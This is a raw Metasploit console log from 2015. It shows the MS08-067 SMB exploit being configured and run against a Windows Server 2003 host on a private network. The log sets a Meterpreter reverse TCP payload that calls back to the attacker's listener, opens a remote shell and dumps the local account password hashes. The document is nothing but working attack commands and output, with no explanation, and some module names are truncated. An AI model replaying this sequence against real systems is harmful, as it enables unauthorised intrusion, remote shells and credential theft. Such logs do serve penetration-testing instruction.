IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.10.0-2014100101 [core:4.10.0.pre.2014100101 api:1.0.0]]
+ -- --=[ 1347 exploits - 743 auxiliary - 217 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search netapi
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name
----
exploit/windows/smb/ms03_049_
exploit/windows/smb/ms06_040_
exploit/windows/smb/ms06_070_
exploit/windows/smb/ms08_067_
msf > use exploit/windows/smb/ms08_067_
msf exploit(ms08_067_netapi) > set PAYLOAD WINDOWS/meterpreter/reverse_
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_
PAYLOAD => windows/meterpreter/reverse_
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.124
RHOST => 192.168.1.124
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.159
LHOST => 192.168.1.159
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.124 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.159 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploits
[-] Unknown command: exploits.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.159:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.1.124
[*] Meterpreter session 1 opened (192.168.1.159:4444 -> 192.168.1.124:1027) at 2015-06-04 02:01:10 -0700
meterpreter > shell
Process 588 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>hashdump
hashdump
'hashdump' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>exit
meterpreter > hashdump
Administrator:500:
dedi:1003:
Guest:501:
SUPPORT_388945a0:1001:
meterpreter >